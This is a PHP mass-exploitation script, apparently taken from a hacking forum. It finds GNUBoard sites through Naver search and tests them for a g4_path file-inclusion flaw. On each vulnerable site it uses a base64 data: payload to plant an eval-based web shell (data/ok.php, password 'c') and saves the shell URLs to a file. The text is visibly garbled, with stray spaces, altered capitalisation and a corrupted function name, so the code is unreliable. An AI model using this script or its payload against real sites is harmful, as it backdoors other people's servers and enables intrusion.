Purreth
Still from bangziguo =. =
<? Php
Echo "+ ---------------------------------------------------------------- + ";
Echo "http://www.t00ls.net ";
Echo "+ ---------------------------------------------------------------- + ";
For ($ ii = 1; $ ii <= 99; $ ii ++)
{
$ C = (int) $ ii * 10 + 1;
$ A = "web.search.naver.com ";
$ B = "/search. naver? Where = webkr & query = bbs/board. php & xc = & docid = 0 & lang = all & st = s & fd = 2 & start = ". $ c. "& display = 10
& Qvt = 0 & sm = tab_pge ";
Get ($ a, $ B );
}
Function get ($ host, $ file)
{
$ Fp = fsockopen ($ host, 80, $ errno, $ errstr, 10 );
If (! $ Fp ){
Echo "SocketError: $ errstr ($ errno )";
Return false;
}
$ Get = "GET $ file HTTP/1.1 ";
$ Get. = "Host: $ host ";
$ Get. = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv: 1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 ";
$ Get. = "Referer: http: // $ host ";
$ Get. = "Connection: Close ";
$ Get. = "Cookie: ns_acl_nautocomplete = 1; NB = Beijing; NNB = AIUHYPM7OXJUS; page_uid = fOL9uloi5UNssbPX/M8sss -- 100532; _ naver_usersession _ = Beijing ";
Fwrite ($ fp, $ get );
$ Response = stream_get_contents ($ fp );
Preg_match_all ("(http: // [-w.] + (: d + )? (/([W/_.] *)? Bbs/board. php) ", $ response, $ put );
For ($ I = 0; $ I <count ($ put [0]); $ I ++)
{
$ A = (int) $ I * 3;
Fuck ($ put [0] [$ a]);
// Echo count ($ put [0]);
// Print_r ($ put [0]);
// Fuck ($ put [0] [$ I]);
Break;
}
Fclose ($ fp );
}
Function fuck ($ OK)
{
$ A = preg_replace (bbs/board. php), $ OK );
$ File = $ a. "common. php? G4_path =/tmp %002345 ";
$ Xxx = $ a. "common. php? G4_path = data:; base64, PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/
CGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg = ";
$ Shell = $ a. "data/OK. php ";
$ Target = parse_url ($ OK );
$ Sitepath = $ target [host];
$ Xx = @ file_get_contents ($ file );
If (eregi ("(Warning)", $ xx) & eregi ("(tmp)", $ xx ))
{
Print $ sitepath. "Vulnerability yes "."";
@ File_get_contents ($ xxx );
$ Oksehll = @ file_get_contents ($ shell );
If (! Eregi ("/\ 02345)", $ xx ))
{
Print $ sitepath. "% 00 OK "."";
}
If (eregi ("(fuckyou)", $ oksehll ))
{
Print $ shell. "pass: c "."";
$ Axx = "". $ shell;
Mongoshadefopen(gnuboard.txt, "a + ");
Fwrite ($ sh, $ axx );
Fclose ($ sh );
}
}
Else
{
Print $ sitepath. "Vulnerability no "."";
}
}
?>